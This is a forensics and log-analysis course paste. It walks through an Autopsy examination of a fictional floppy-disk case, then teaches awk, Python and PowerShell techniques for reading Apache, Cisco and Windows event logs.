joemccray

CHFI

Jun 28th, 2016
1,887
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Please download the following file:
  2. https://s3.amazonaws.com/StrategicSec-Files/Basic_Forensics_Lab_Manual_Labs_1-9.docx
  3.  
  4.  
  5. ##############################
  6. # Day 1: Dead Box Forensics #
  7. ##############################
  8. VM for these labs
  9. -----------------
  10. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  11. user: malware
  12. pass: malware
  13.  
  14.  
  15. Type the following command in a terminal window
  16. cd /home/malware/Desktop/HelixLabs/
  17. unzip image.zip
  18. sudo apt-get install -y autopsy bless
  19.  
  20.  
  21. From your terminal, type 'sudo autopsy' and press enter. This will start a web server that will listen on port 9999.
  22.  
  23. Simply open up Firefox and navigate to http://localhost:9999/autopsy.
  24.  
  25.  
  26. If you wait a few seconds, Firefox should open up automatically.
  27.  
  28. If you scroll down you will see “Open Case” “New Case” “Help”. We want “New Case”.
  29.  
  30. The next few screens we will need to fill out some information.
  31.  
  32. Reference:
  33. Basic_Forensics_Lab_Manual_Labs_1-9.docx Page 9
  34.  
  35.  
  36.  
  37.  
  38. Case Name: Case1
  39. Description: None
  40. Investigator Names: <Your Name>
  41.  
  42. Click “New Case” when you’re ready.
  43.  
  44.  
  45. Reference:
  46. Basic_Forensics_Lab_Manual_Labs_1-9.docx Page 10
  47.  
  48.  
  49.  
  50.  
  51.  
  52. At this screen, click “Add Host”
  53.  
  54. The following screen should be left as is. So just click “Add Host” at the bottom of the screen to move on.
  55.  
  56. Simply click “Add Image”
  57.  
  58.  
  59. Reference:
  60. Basic_Forensics_Lab_Manual_Labs_1-9.docx Page 12
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67. Click “Add Image File”
  68.  
  69. Reference:
  70. Basic_Forensics_Lab_Manual_Labs_1-9.docx Page 13
  71.  
  72.  
  73. On the “Add A New Image” screen we need to fill out some information.
  74.  
  75. Location: This is where you unzipped the image from the image.zip (provided) too. For example, if you unzipped it to the default path, the path will be “/home/malware/Desktop/HelixLabs/image”
  76.  
  77. Type: Disk
  78. Import Method: Move
  79.  
  80.  
  81. Reference:
  82. Basic_Forensics_Lab_Manual_Labs_1-9.docx Page 14
  83.  
  84.  
  85.  
  86. When you’re done click “Next”
  87.  
  88.  
  89.  
  90.  
  91. On this screen, change it from “Disk Image” to “Volume Image” and the click OK
  92.  
  93. Reference:
  94. Basic_Forensics_Lab_Manual_Labs_1-9.docx Page 16
  95.  
  96.  
  97.  
  98.  
  99. Here we want to calculate the hash value and verify after importing. Also, leave the “File System Details” the way they are.
  100.  
  101. Click “Add” when you are ready to move on.
  102.  
  103. Hit “OK”
  104.  
  105. Finally, click “Analyze” to start analyzing the image.
  106.  
  107.  
  108.  
  109.  
  110.  
  111. Police Report – First Case
  112.  
  113. Reference:
  114. Basic_Forensics_Lab_Manual_Labs_1-9.docx Page 20
  115.  
  116. Before we go through the image, let’s read the police report to see what we are up against.
  117.  
  118. The scenario is: Joe Jacobs, 28, was arrested yesterday on charges of selling illegal drugs to high school students. A local police officer posed as a high school student was approached by Jacobs in the parking lot of Smith Hill High School. Jacobs asked the undercover cop if he would like to buy some marijuana. Before the undercover cop could answer, Jacobs pulled some out of his pocket and showed it to the officer. Jacobs said to the officer "Look at this stuff, Colombians couldn't grow it better! My supplier not only sells it direct to me, he grows it himself."
  119.  
  120. Jacobs has been seen on numerous occasions hanging out at various local high school parking lots around 2:30pm, the time school usually ends for the day. School officials from multiple high schools have called the police regarding Jacobs' presence at their school and noted an increase in drug use among students, since his arrival.
  121.  
  122. The police need your help. They want to try and determine if Joe Jacobs has been selling drugs to students at other schools besides Smith Hill. The problem is no students will come forward and help the police. Based on Joe's comment regarding the Colombians, the police are interested in finding Joe Jacob's supplier/producer of marijuana.
  123.  
  124. Jacobs has denied selling drugs at any other school besides Smith Hill and refuses to provide the police with the name of his drug supplier/producer. Jacobs also refuses to validate the statement that he made to the undercover officer right before his arrest. Upon issuing a search warrant and searching of the suspect's house the police were able to obtain a small amount of marijuana. The police also seized a single floppy disk, but no computer and/or other media was present in the house.
  125.  
  126. The police have imaged the suspect's floppy disk and have provided you with a copy. They would like you to examine the floppy disk and provide answers to the following questions. The police would like you to pay special attention to any information that might prove that Joe Jacobs was in fact selling drugs at other high schools besides Smith Hill. They would also like you to try and determine if possible who Joe Jacob's supplier is.
  127.  
  128. Jacob's posted bail set at $10,000.00. Afraid he may skip town, the police would like to get him locked up as soon as possible. To do so, the police have asked that you have the results fully completed and submitted by October 25, 2002. Please provide the police with a strong case consisting of your specific findings related to the questions, where the findings are located on the disk, processes and techniques used, and any actions that the suspect may have taken to intentionally delete, hide and/or alter data on the floppy disk. Good Luck!
  129.  
  130. Any names, locations, and situations presented are completely made up. Any resemblance to any name, locations and/or situation is purely coincidence.
  131.  
  132.  
  133. Questions for the First Case
  134.  
  135. 1) Who is Joe Jacob's supplier of marijuana and what is the address listed for the supplier?
  136. 2) What crucial data is available within the coverpage.jpg file and why is this data crucial?
  137. 3) What (if any) other high schools besides Smith Hill does Joe Jacobs frequent?
  138. 4) For each file, what processes were taken by the suspect to mask them from others?
  139. 5) What processes did you (the investigator) use to successfully examine the entire contents of each file?
  140. 6) What Microsoft program was used to create the Cover Page file. What is your proof? (Proof is the key to getting this question right, not just making a guess).
  141.  
  142.  
  143.  
  144. Question 1:
  145. The file that we are most interested in is the “JimmyJungle.doc” Export the file to your desktop by clicking on the file name and then export in the lower frame. Open it up in Open Office.
  146.  
  147.  
  148. Bingo! The suppliers name and address.
  149. Jimmy Jungle
  150. 626 Jungle Ave Apt 2
  151. Jungle, NY 11111
  152.  
  153.  
  154.  
  155.  
  156. Question 2:
  157.  
  158. What crucial data is available within the coverpage.jpg file and why is this data crucial?
  159. In the same “File Analysis” screen let’s analyze the cover page.
  160.  
  161. Nothing very interesting here, let’s check the metadata. Under Hex click report.
  162.  
  163. Let’s note the size
  164.  
  165. Size: 15585 bytes (0x3ce1)
  166.  
  167. Now let’s move over to “Image Detail” on the top tabs.
  168.  
  169. Scroll all the way to the bottom and click “73-103(31) -> EOF”
  170.  
  171. It looks like a bunch of junk, let’s examine it a bit more closely.
  172.  
  173. “pw=goodtimes” hmm wonder what that could mean. There is another way that we could pull this out. Click “display” under Hex at the top of the screen. To me this is a bit easier to see and go through. The password was hidden away in the slack space of the file.
  174.  
  175.  
  176.  
  177.  
  178. Question 3:
  179.  
  180. What (if any) other high schools besides Smith Hill does Joe Jacobs frequent?
  181.  
  182. For this next question let’s go back to the “File Analysis” screen and click on “Scheduled Visits.exe”.
  183.  
  184.  
  185.  
  186. Something that stands out almost immediately is the “Scheduled Visits.xls” there is an excel spreadsheet in there. Something tells me that this is not an executable. To find out whether this is or not, we need to look at the file signature. Under ASCII click “report”
  187.  
  188. The information that we are interested in is the “Sectors 104 105” As well as the “File Type” notice it says “empty (Zip archive data, at least v2.0 to extract)” Let’s go back to the “Image Details” screen and scroll to the bottom.
  189.  
  190. We want to look at sectors 104 – 108.
  191.  
  192. Here is the ASCII contents of sectors 104 – 108. To figure out the file signature we need to look at the Hex. Click on “display” under Hex.
  193.  
  194. Our file starts at 104 and we are currently viewing Sectors 104 – 108, so we don’t really need to hunt around in the hex. What we need to pay attention too is the first 4 bytes. Zip files have a file signature of 50 4B 03 04 or PK.. (that’s P K <dot> <dot>). For a list of different file signatures visit (http://www.garykessler.net/library/file_sigs.html ). What do we see? The very top of the Hex dump 504b0304 and PK… Looks like it is a zip file. Export the file and change the file extension from .exe to .zip.
  195.  
  196.  
  197. If you want to perform these steps in a hex editor then you can use Bless by typing the following commands in a terminal window:
  198. cd /home/malware/Desktop/HelixLabs/
  199. unzip image.zip
  200. sudo apt-get install -y bless
  201. bless image
  202.  
  203.  
  204. ########################
  205. # Day 1: Log Analysis #
  206. ########################
  207.  
  208.  
  209. ##########
  210. # VMWare #
  211. ##########
  212. - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
  213.  
  214. - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
  215.  
  216.  
  217. VM for these labs
  218. -----------------
  219. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  220. user: strategicsec
  221. pass: strategicsec
  222.  
  223. https://s3.amazonaws.com/StrategicSec-VMs/Win7x64.zip
  224. username: workshop
  225. password: password
  226.  
  227.  
  228.  
  229.  
  230. ##############################################
  231. # Log Analysis with Linux command-line tools #
  232. ##############################################
  233. The following command line executables are found in the Mac as well as most Linux Distributions.
  234.  
  235. cat – prints the content of a file in the terminal window
  236. grep – searches and filters based on patterns
  237. awk – can sort each row into fields and display only what is needed
  238. sed – performs find and replace functions
  239. sort – arranges output in an order
  240. uniq – compares adjacent lines and can report, filter or provide a count of duplicates
  241.  
  242.  
  243.  
  244. ###############
  245. # Apache Logs #
  246. ###############
  247.  
  248. Reference:
  249. http://www.the-art-of-web.com/system/logs/
  250.  
  251. wget https://s3.amazonaws.com/SecureNinja/Python/access_log
  252.  
  253.  
  254. You want to list all user agents ordered by the number of times they appear (descending order):
  255.  
  256. awk -F\" '{print $6}' access_log | sort | uniq -c | sort -fr
  257.  
  258.  
  259.  
  260. Using the default separator which is any white-space (spaces or tabs) we get the following:
  261.  
  262. awk '{print $1}' access_log # ip address (%h)
  263. awk '{print $2}' access_log # RFC 1413 identity (%l)
  264. awk '{print $3}' access_log # userid (%u)
  265. awk '{print $4,5}' access_log # date/time (%t)
  266. awk '{print $9}' access_log # status code (%>s)
  267. awk '{print $10}' access_log # size (%b)
  268.  
  269. You might notice that we've missed out some items. To get to them we need to set the delimiter to the " character which changes the way the lines are 'exploded' and allows the following:
  270.  
  271. awk -F\" '{print $2}' access_log # request line (%r)
  272. awk -F\" '{print $4}' access_log # referer
  273. awk -F\" '{print $6}' access_log # user agent
  274.  
  275.  
  276. awk -F\" '{print $6}' access_log \
  277. | sed 's/(\([^;]\+; [^;]\+\)[^)]*)/(\1)/' \
  278. | sort | uniq -c | sort -fr
  279.  
  280.  
  281. The next step is to start filtering the output so you can narrow down on a certain page or referer. Would you like to know which pages Google has been requesting from your site?
  282.  
  283. awk -F\" '($6 ~ /Googlebot/){print $2}' access_log | awk '{print $2}'
  284. Or who's been looking at your guestbook?
  285.  
  286. awk -F\" '($2 ~ /guestbook\.html/){print $6}' access_log
  287.  
  288.  
  289. Reference:
  290. https://blog.nexcess.net/2011/01/21/one-liners-for-apache-log-files/
  291.  
  292. # top 20 URLs from the last 5000 hits
  293. tail -5000 ./access_log | awk '{print $7}' | sort | uniq -c | sort -rn | head -20
  294. tail -5000 ./access_log | awk '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
  295.  
  296. # top 20 URLS excluding POST data from the last 5000 hits
  297. tail -5000 ./access_log | awk -F"[ ?]" '{print $7}' | sort | uniq -c | sort -rn | head -20
  298. tail -5000 ./access_log | awk -F"[ ?]" '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
  299.  
  300. # top 20 IPs from the last 5000 hits
  301. tail -5000 ./access_log | awk '{print $1}' | sort | uniq -c | sort -rn | head -20
  302. tail -5000 ./access_log | awk '{freq[$1]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
  303.  
  304. # top 20 URLs requested from a certain ip from the last 5000 hits
  305. IP=1.2.3.4; tail -5000 ./access_log | grep $IP | awk '{print $7}' | sort | uniq -c | sort -rn | head -20
  306. IP=1.2.3.4; tail -5000 ./access_log | awk -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
  307.  
  308. # top 20 URLS requested from a certain ip excluding, excluding POST data, from the last 5000 hits
  309. IP=1.2.3.4; tail -5000 ./access_log | fgrep $IP | awk -F "[ ?]" '{print $7}' | sort | uniq -c | sort -rn | head -20
  310. IP=1.2.3.4; tail -5000 ./access_log | awk -F"[ ?]" -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
  311.  
  312. # top 20 referrers from the last 5000 hits
  313. tail -5000 ./access_log | awk '{print $11}' | tr -d '"' | sort | uniq -c | sort -rn | head -20
  314. tail -5000 ./access_log | awk '{freq[$11]++} END {for (x in freq) {print freq[x], x}}' | tr -d '"' | sort -rn | head -20
  315.  
  316. # top 20 user agents from the last 5000 hits
  317. tail -5000 ./access_log | cut -d\ -f12- | sort | uniq -c | sort -rn | head -20
  318.  
  319. # sum of data (in MB) transferred in the last 5000 hits
  320. tail -5000 ./access_log | awk '{sum+=$10} END {print sum/1048576}'
  321.  
  322.  
  323. ##############
  324. # Cisco Logs #
  325. ##############
  326.  
  327. wget https://s3.amazonaws.com/StrategicSec-Files/LogAnalysis/cisco.log
  328.  
  329.  
  330. AWK Basics
  331. ----------
  332. To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
  333.  
  334. cat cisco.log | awk '{print $5}' | tail -n 4
  335.  
  336.  
  337.  
  338.  
  339. Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
  340.  
  341. cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
  342.  
  343.  
  344.  
  345.  
  346. While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
  347.  
  348. cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
  349.  
  350.  
  351.  
  352.  
  353.  
  354. Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
  355.  
  356. cat cisco.log | grep %LINEPROTO-5-UPDOWN:
  357.  
  358. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
  359.  
  360. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
  361.  
  362. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
  363.  
  364.  
  365.  
  366.  
  367. #################################
  368. # Using Python for log analysis #
  369. #################################
  370.  
  371.  
  372.  
  373.  
  374. ###########################################
  375. # Python Basics Lesson 1: Simple Printing #
  376. ###########################################
  377.  
  378. >>> print 1
  379.  
  380. >>> print hello
  381.  
  382. >>> print "hello"
  383.  
  384. >>> print "Today we are learning Python."
  385.  
  386.  
  387.  
  388. ###################################################
  389. # Python Basics Lesson 2: Simple Numbers and Math #
  390. ###################################################
  391.  
  392. >>> 2+2
  393.  
  394. >>> 6-3
  395.  
  396. >>> 18/7
  397.  
  398. >>> 18.0/7
  399.  
  400. >>> 18.0/7.0
  401.  
  402. >>> 18/7
  403.  
  404. >>> 9%4
  405.  
  406. >>> 8%4
  407.  
  408. >>> 8.75%.5
  409.  
  410. >>> 6.*7
  411.  
  412. >>> 6*6*6
  413.  
  414. >>> 6**3
  415.  
  416. >>> 5**12
  417.  
  418. >>> -5**4
  419.  
  420.  
  421.  
  422.  
  423.  
  424.  
  425. #####################################
  426. # Python Basics Lesson 3: Variables #
  427. #####################################
  428.  
  429. >>> x=18
  430.  
  431. >>> x+15
  432.  
  433. >>> x**3
  434.  
  435. >>> y=54
  436.  
  437. >>> x+y
  438.  
  439. >>> age=input("Enter number here: ")
  440. 43
  441.  
  442. >>> age+32
  443.  
  444. >>> age**3
  445.  
  446. >>> fname = raw_input("Enter your first name: ")
  447.  
  448. >>> lname = raw_input("Enter your first name: ")
  449.  
  450. >>> fname = raw_input("Enter your name: ")
  451. Enter your name: Joe
  452.  
  453. >>> lname = raw_input("Enter your name: ")
  454. Enter your name: McCray
  455.  
  456. >>> print fname
  457. Joe
  458.  
  459. >>> print lname
  460. McCray
  461.  
  462. >>> print fname lname
  463.  
  464. >>> print fname+lname
  465. JoeMcCray
  466.  
  467.  
  468.  
  469. NOTE:
  470. Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
  471.  
  472.  
  473.  
  474.  
  475.  
  476. #################################################
  477. # Python Basics Lesson 4: Modules and Functions #
  478. #################################################
  479.  
  480. >>> 5**4
  481.  
  482. >>> pow(5,4)
  483.  
  484. >>> abs(-18)
  485.  
  486. >>> abs(5)
  487.  
  488. >>> floor(18.7)
  489.  
  490. >>> import math
  491.  
  492. >>> math.floor(18.7)
  493.  
  494. >>> math.sqrt(81)
  495.  
  496. >>> joe = math.sqrt
  497.  
  498. >>> joe(9)
  499.  
  500. >>> joe=math.floor
  501.  
  502. >>> joe(19.8)
  503.  
  504.  
  505.  
  506.  
  507.  
  508.  
  509.  
  510.  
  511.  
  512. ###################################
  513. # Python Basics Lesson 5: Strings #
  514. ###################################
  515.  
  516. >>> "XSS"
  517.  
  518. >>> 'SQLi'
  519.  
  520. >>> "Joe's a python lover"
  521.  
  522. >>> 'Joe\'s a python lover'
  523.  
  524. >>> "Joe said \"InfoSec is fun\" to me"
  525.  
  526. >>> a = "Joe"
  527.  
  528. >>> b = "McCray"
  529.  
  530. >>> a, b
  531.  
  532. >>> a+b
  533.  
  534.  
  535.  
  536.  
  537.  
  538.  
  539.  
  540.  
  541. ########################################
  542. # Python Basics Lesson 6: More Strings #
  543. ########################################
  544.  
  545. >>> num = 10
  546.  
  547. >>> num + 2
  548.  
  549. >>> "The number of open ports found on this system is " + num
  550.  
  551. >>> num = str(18)
  552.  
  553. >>> "There are " + num + " vulnerabilities found in this environment."
  554.  
  555. >>> num2 = 46
  556.  
  557. >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
  558.  
  559.  
  560.  
  561. NOTE:
  562. Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
  563.  
  564.  
  565.  
  566.  
  567.  
  568.  
  569.  
  570. ###############################################
  571. # Python Basics Lesson 7: Sequences and Lists #
  572. ###############################################
  573.  
  574. >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  575.  
  576. >>> attacks
  577. ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  578.  
  579. >>> attacks[3]
  580. 'SQL Injection'
  581.  
  582. >>> attacks[-2]
  583. 'Cross-Site Scripting'
  584.  
  585.  
  586.  
  587.  
  588.  
  589.  
  590. ########################################
  591. # Python Basics Level 8: If Statement #
  592. ########################################
  593. >>> attack="SQLI"
  594. >>> if attack=="SQLI":
  595. print 'The attacker is using SQLI'
  596.  
  597. >>> attack="XSS"
  598. >>> if attack=="SQLI":
  599. print 'The attacker is using SQLI'
  600.  
  601.  
  602. #############################
  603. # Reference Videos To Watch #
  604. #############################
  605. Here is your first set of youtube videos that I'd like for you to watch:
  606. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
  607.  
  608.  
  609.  
  610.  
  611.  
  612. #####################################
  613. # Lesson 9: Intro to Log Analysis #
  614. #####################################
  615.  
  616. Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
  617.  
  618. https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
  619. username: strategicsec
  620. password: strategicsec
  621.  
  622. Then execute the following commands:
  623. ---------------------------------------------------------------------------------------------------------
  624.  
  625.  
  626. wget https://s3.amazonaws.com/SecureNinja/Python/access_log
  627.  
  628.  
  629. cat access_log | grep 141.101.80.188
  630.  
  631. cat access_log | grep 141.101.80.187
  632.  
  633. cat access_log | grep 108.162.216.204
  634.  
  635. cat access_log | grep 173.245.53.160
  636.  
  637. ---------------------------------------------------------
  638.  
  639. Google the following terms:
  640. - Python read file
  641. - Python read line
  642. - Python read from file
  643.  
  644.  
  645.  
  646.  
  647. ########################################################
  648. # Lesson 10: Use Python to read in a file line by line #
  649. ########################################################
  650.  
  651.  
  652. Reference:
  653. http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
  654.  
  655.  
  656.  
  657.  
  658.  
  659.  
  660. Let's have some fun.....
  661.  
  662.  
  663. >>> f = open('access_log', "r")
  664.  
  665. >>> lines = f.readlines()
  666.  
  667. >>> print lines
  668.  
  669. >>> lines[0]
  670.  
  671. >>> lines[10]
  672.  
  673. >>> lines[50]
  674.  
  675. >>> lines[1000]
  676.  
  677. >>> lines[5000]
  678.  
  679. >>> lines[10000]
  680.  
  681. >>> print len(lines)
  682.  
  683.  
  684.  
  685.  
  686.  
  687.  
  688.  
  689.  
  690.  
  691. ---------------------------------------------------------
  692. vi logread1.py
  693.  
  694.  
  695. ## Open the file with read only permit
  696. f = open('access_log', "r")
  697.  
  698. ## use readlines to read all lines in the file
  699. ## The variable "lines" is a list containing all lines
  700. lines = f.readlines()
  701.  
  702. print lines
  703.  
  704.  
  705. ## close the file after reading the lines.
  706. f.close()
  707.  
  708. ---------------------------------------------------------
  709.  
  710.  
  711. Google the following:
  712. - python difference between readlines and readline
  713. - python readlines and readline
  714.  
  715.  
  716.  
  717.  
  718.  
  719. #################################
  720. # Lesson 11: A quick challenge #
  721. #################################
  722.  
  723. Can you write an if/then statement that looks for this IP and print "Found it"?
  724.  
  725.  
  726. 141.101.81.187
  727.  
  728.  
  729.  
  730.  
  731.  
  732.  
  733. ---------------------------------------------------------
  734. Hint 1: Use Python to look for a value in a list
  735.  
  736. Reference:
  737. http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
  738.  
  739.  
  740.  
  741.  
  742. ---------------------------------------------------------
  743. Hint 2: Use Python to prompt for user input
  744.  
  745. Reference:
  746. http://www.cyberciti.biz/faq/python-raw_input-examples/
  747.  
  748.  
  749.  
  750.  
  751. ---------------------------------------------------------
  752. Hint 3: Use Python to search for a string in a list
  753.  
  754. Reference:
  755. http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
  756.  
  757.  
  758.  
  759.  
  760.  
  761. Here is my solution:
  762. -------------------
  763. $ python
  764. >>> f = open('access_log', "r")
  765. >>> lines = f.readlines()
  766. >>> ip = '141.101.81.187'
  767. >>> for string in lines:
  768. ... if ip in string:
  769. ... print(string)
  770.  
  771.  
  772.  
  773.  
  774. Here is one student's solution - can you please explain each line of this code to me?
  775. -------------------------------------------------------------------------------------
  776. #!/usr/bin/python
  777.  
  778. f = open('access_log')
  779.  
  780. strUsrinput = raw_input("Enter IP Address: ")
  781.  
  782. for line in iter(f):
  783. ip = line.split(" - ")[0]
  784. if ip == strUsrinput:
  785. print line
  786.  
  787. f.close()
  788.  
  789.  
  790.  
  791.  
  792. -------------------------------
  793.  
  794. Working with another student after class we came up with another solution:
  795.  
  796. #!/usr/bin/env python
  797.  
  798.  
  799. # This line opens the log file
  800. f=open('access_log',"r")
  801.  
  802. # This line takes each line in the log file and stores it as an element in the list
  803. lines = f.readlines()
  804.  
  805.  
  806. # This lines stores the IP that the user types as a var called userinput
  807. userinput = raw_input("Enter the IP you want to search for: ")
  808.  
  809.  
  810.  
  811. # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
  812. for ip in lines:
  813. if ip.find(userinput) != -1:
  814. print ip
  815.  
  816.  
  817.  
  818. ##################################################
  819. # Lesson 12: Look for web attacks in a log file #
  820. ##################################################
  821.  
  822. In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
  823. Supported attacks:
  824. 1. SQL Injection
  825. 2. Local File Inclusion
  826. 3. Remote File Inclusion
  827. 4. Cross-Site Scripting
  828.  
  829.  
  830.  
  831. wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
  832.  
  833. The usage for scan_log.py is simple. You feed it an apache log file.
  834.  
  835. cat scan_log.py | less (use your up/down arrow keys to look through the file)
  836.  
  837.  
  838.  
  839.  
  840.  
  841. ################################
  842. # Log Analysis with Powershell #
  843. ################################
  844.  
  845. VM for these labs
  846. -----------------
  847. https://s3.amazonaws.com/StrategicSec-VMs/Win7x64.zip
  848. username: workshop
  849. password: password
  850.  
  851.  
  852. You can do the updates in the Win7 VM (yes, it is a lot of updates).
  853.  
  854. You'll need to create directory in the Win7 VM called "c:\ps"
  855.  
  856. #####################
  857. # Powershell Basics #
  858. #####################
  859.  
  860. PowerShell is Microsoft’s new scripting language that has been built in since the release Vista.
  861.  
  862. PowerShell file extension end in .ps1 .
  863.  
  864. An important note is that you cannot double click on a PowerShell script to execute it.
  865.  
  866. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
  867.  
  868. dir
  869. cd
  870. ls
  871. cd c:\
  872.  
  873.  
  874. To obtain a list of cmdlets, use the Get-Command cmdlet
  875.  
  876. Get-Command
  877.  
  878.  
  879.  
  880. You can use the Get-Alias cmdlet to see a full list of aliased commands.
  881.  
  882. Get-Alias
  883.  
  884.  
  885.  
  886. Don't worry you won't blow up your machine with Powershell
  887. Get-Process | stop-process What will this command do?
  888. Get-Process | stop-process -whatif
  889.  
  890.  
  891. To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
  892.  
  893. Get-Help Get-Command
  894.  
  895. Get-Help Get-Service –online
  896.  
  897. Get-Service -Name TermService, Spooler
  898.  
  899. Get-Service –N BITS
  900.  
  901. Start-Transcript
  902.  
  903. PowerShell variables begin with the $ symbol. First lets create a variable
  904.  
  905. $serv = Get-Service –N Spooler
  906.  
  907. To see the value of a variable you can just call it in the terminal.
  908.  
  909. $serv
  910.  
  911. $serv.gettype().fullname
  912.  
  913.  
  914. Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
  915.  
  916. $serv | Get-Member
  917.  
  918. Get-Member -InputObject $serv
  919.  
  920.  
  921.  
  922.  
  923.  
  924. Let’s use a method and a property with our object.
  925.  
  926. $serv.Status
  927. $serv.Stop()
  928. $serv.Refresh()
  929. $serv.Status
  930. $serv.Start()
  931. $serv.Refresh()
  932. $serv.Status
  933.  
  934.  
  935.  
  936.  
  937. Methods can return properties and properties can have sub properties. You can chain them together by appending them to the first call.
  938.  
  939.  
  940.  
  941. #############################
  942. # Simple Event Log Analysis #
  943. #############################
  944.  
  945. Step 1: Dump the event logs
  946. ---------------------------
  947. The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
  948.  
  949. To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
  950. If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
  951.  
  952. Get-EventLog -LogName application | Export-Clixml Applog.xml
  953.  
  954. type .\Applog.xml
  955.  
  956. $logs = "system","application","security"
  957.  
  958. The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
  959.  
  960. $logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
  961.  
  962.  
  963.  
  964. Step 2: Import the event log of interest
  965. ----------------------------------------
  966. To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
  967. Store the results in a variable.
  968. Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
  969.  
  970. The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
  971.  
  972. $seclog = Import-Clixml security.xml
  973.  
  974. $seclog | select -Last 5
  975.  
  976.  
  977. Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
  978.  
  979. Get-EventLog Application -After (Get-Date).AddDays(-1)
  980.  
  981. You can use '-after' and '-before' to filter date ranges
  982.  
  983. One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
  984. By default, an ordinary user does not have permission to read the security log.
  985.  
  986.  
  987. Step 3: Drill into a specific entry
  988. -----------------------------------
  989. To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
  990.  
  991.  
  992. $seclog | select -first 1 | fl *
  993.  
  994. The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
  995.  
  996.  
  997. ($seclog | select -first 1).message
  998.  
  999. (($seclog | select -first 1).message).gettype()
  1000.  
  1001.  
  1002.  
  1003. In the *nix world you often want a count of something (wc -l).
  1004. How often is the SeSecurityPrivilege privilege mentioned in the message property?
  1005. To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
  1006.  
  1007. $seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
  1008.  
  1009. If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
  1010.  
  1011.  
  1012. $seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
  1013.  
  1014. Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
  1015. Use the count property to determine the total number of entries in the event log.
  1016.  
  1017. $seclog.Count
  1018.  
  1019.  
  1020.  
  1021.  
  1022.  
  1023.  
  1024. ############################
  1025. # Simple Log File Analysis #
  1026. ############################
  1027.  
  1028.  
  1029. You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
  1030.  
  1031.  
  1032. mkdir c:\ps
  1033. cd c:\ps
